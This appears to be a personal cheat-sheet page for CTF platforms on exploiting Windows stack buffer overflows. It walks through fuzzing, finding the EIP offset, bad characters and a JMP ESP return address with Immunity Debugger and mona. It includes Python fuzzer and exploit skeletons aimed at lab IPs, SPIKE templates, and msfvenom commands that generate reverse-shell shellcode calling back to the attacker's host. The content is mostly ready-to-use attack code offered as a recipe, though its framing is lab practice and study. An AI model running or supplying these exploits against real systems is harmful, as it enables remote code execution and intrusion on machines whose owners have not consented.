TryhackmeHackthebox

Windows

00. Basic Process

## ------------------| Setup Immunity Debugger
## Run Immunity Debugger as admin user.
## Press CTRL + F1 to attach service.

## ------------------| Config Mona
!mona config -set workingfolder c:\mona\%p

## ------------------| Fuzzing
## Run fuzzing script to catch the buffer size.
## Imagine your programe was crashed when it hit 2000 buffer size,
## then please use 2400 or 2600 as <BufferSize> value.

## ------------------| Find the offset value
## Create cyclic pattern
/usr/share/metasploit-framework/tools/exploit/pattern_create.rb -l <BufferSize>
## After crash the programe, copy the ESP value 
/usr/share/metasploit-framework/tools/exploit/pattern_offset.rb -q <EIP_ADDRESS>
## Or you can use mona to find offset value as well.
!mona findmsp -distance <BufferSize>
## To verify this use buffer as following
buf = "A" * offset + "B" * 4
## Then you will get EIP as 42424242.

## ------------------| Find bad characters
## Copy following as badchars
badchars = "\x01\x02\x03\x04\x05\x06\x07\x08\x09\x0a\x0b\x0c\x0d\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f\x20\x21\x22\x23\x24\x25\x26\x27\x28\x29\x2a\x2b\x2c\x2d\x2e\x2f\x30\x31\x32\x33\x34\x35\x36\x37\x38\x39\x3a\x3b\x3c\x3d\x3e\x3f\x40\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4a\x4b\x4c\x4d\x4e\x4f\x50\x51\x52\x53\x54\x55\x56\x57\x58\x59\x5a\x5b\x5c\x5d\x5e\x5f\x60\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6a\x6b\x6c\x6d\x6e\x6f\x70\x71\x72\x73\x74\x75\x76\x77\x78\x79\x7a\x7b\x7c\x7d\x7e\x7f\x80\x81\x82\x83\x84\x85\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f\xa0\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf\xb0\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf\xc0\xc1\xc2\xc3\xc4\xc5\xc6\xc7\xc8\xc9\xca\xcb\xcc\xcd\xce\xcf\xd0\xd1\xd2\xd3\xd4\xd5\xd6\xd7\xd8\xd9\xda\xdb\xdc\xdd\xde\xdf\xe0\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0\xf1\xf2\xf3\xf4\xf5\xf6\xf7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xff"                   
## Edit the payload buffer as following
buff = "A" * offset + "B" * 4 + badchars 
## After send the evil buffer, right click the ESP value and select Follow in Dump.
## Then you can see the char values on Hex dump section.
## Or you can use mona to do that for you
!mona bytearray -b "\x00"
!mona compare -f C:\mona\<ProgrameName>\bytearray.bin -a <ESP_ADDRESS>
## Replicate the scenario until it give status as unmodified

## ------------------| Find the return address
!mona jmp -r esp -cpb "<Bad_Chars>"
## Then lock for Log data(2) window
## After that copy the address. Ex: 0F9E24F9
## And then convert it to little endian format. Ex: \xF9\x24\x9E\x0F
## After all you buffer would be like following
buff = "A" * offset + "\xF9\x24\x9E\x0F" 
## Before run the programe, create break point on 0F9E24F9 address.

## ------------------| Create the payload
msfvenom -p windows/shell_reverse_tcp LHOST=<YOUR_IP> LPORT=4545 EXITFUNC=thread -b "\x00" -f c
msfvenom -p windows/shell_reverse_tcp LHOST=<YOUR_IP> LPORT=<PORT> EXITFUNC=thread -f c -e x86/shikata_ga_nai  -b "\x00"
## Paste hex values as follow
payload = ("\xbd........\xb1"
"........"
".....")
## After all you buffer would be like following
buff = "A" * offset + "\xF9\x24\x9E\x0F" + "\x90" * 16 + payload

01. Fuzzing Skeletons

  • Basic

#!/usr/bin/env python3
import socket, time, sys

host = '192.168.228.10'
port = 110

buf = "A" * 1000

while (True):
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    s.connect((host,port))
    s.recv(1024)
    s.send(bytes('USER '+buf+'\r\n',"latin-1"))
    s.recv(1024)
    s.send(bytes('QUIT\r\n',"latin-1"))
    s.close()
    time.sleep(1)
    buf += "A" * 1000
    print("Send buffer {}!".format(len(buf)))
#!/usr/bin/env python3
import socket, time, sys

ip = "10.10.11.32"
port = 1337
prefix = "STATS "

timeout = 5
string = prefix + "A" * 100

print("================[ Fuzzing Start ]=================")
while True:
  try:
    with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as s:
      s.settimeout(timeout)
      s.connect((ip, port))
      s.recv(1024)
      print("[+] Fuzzing {} bytes...".format(len(string) - len(prefix)))
      s.send(bytes(string, "latin-1"))
      s.recv(1024)
  except:
    print("-" * 50)
    print("\033[38;5;208m[!]\033[0;0m Program crashed at\033[92m {}\033[00m bytes !".format(len(string) - len(prefix)))
    print("-" * 50)
    sys.exit(0)
  string += 100 * "A"
  time.sleep(1)

  • HTTP Fuzzer

#!/usr/bin/python3

import socket, time, sys

host="127.0.0.1"
port=80
uri="/login"

buff_size = 100

while(buff_size < 2000):
  try:
    print(f'[+] Sending malicious buffer with {buff_size} ..!')
    input_buffer = "A" * buff_size
    post_data = f'username={input_buffer}&password=test'
    #print(post_data)
    buffer =  f'POST {uri} HTTP/1.1\r\n'
    buffer += f'HOST: {host}\r\n'
    buffer += f'Content-Type: application/x-www-form-urlencoded\r\n'
    buffer += f'Content-Length: {str(len(post_data))}\r\n'
    buffer += '\r\n'
    buffer += post_data
    
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    s.connect((host, port))
    s.send(buffer.encode())
    s.close()
    buff_size += 100
    time.sleep(10)

  except:
    print("[-] Could not connect!")
    sys.exit()

02. Crash Replication & Controlling EIP

#!/usr/bin/env python3
import socket

ip = "10.10.11.32"
port = 1337
prefix = "STATS "

offset = 0
overflow = "A" * offset
retn = ""       # 625011AF <--> \xaf\x11\x50\x62
padding = ""    # "\x90" * 16
payload = ""
postfix = ""

buffer = prefix + overflow + retn + padding + payload + postfix
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)

try:
  s.connect((ip, port))
  print("-" * 50)
  print("[!] Sending the buffer...")
  s.send(bytes(buffer + "\r\n", "latin-1"))
  print("\033[38;5;208m[+]\033[0;0m Done!")
  print("-" * 50)
except:
  print("[*] Unable to connect!")

03. Generate bad chars

#!/usr/bin/env python3

from __future__ import print_function

#tart with 00 and add any others you find
bad = "00".split()

#turns them into a nice string to copy into python
print("badchars = ")
for x in range(1, 256):
	if "{:02x}".format(x) not in bad: 
		print("\\x" + "{:02x}".format(x), end='')

#creates a nice string to use in Mona
print("\n\nfor mona")
for byte in bad:
	print("\\x{}".format(byte), end='')
print()
#!/usr/bin/env python3
for x in range(1, 256):
  print("\\x" + "{:02x}".format(x), end='')
print()

04. Mona Scripts

# -----------------| Configure mona for current running application
!mona config -set workingfolder c:\mona\%p

# -----------------| Finding the crash
!mona findmsp -distance 600

# -----------------| Finding the bad chars
!mona bytearray -b "\x00"
!mona compare -f C:\mona\bytearray.bin -a <address>

# -----------------| Finding a Jump Point
!mona jmp -r esp -cpb "\x00"

05. Spiking

./generic_send_tcp <IP/HOST> <PORT> script.spk 0 0

# -----------| spike script template
s_readline():
s_string("CMD ");
s_string_variable("0");
PreviousLinuxNextRed team

Last updated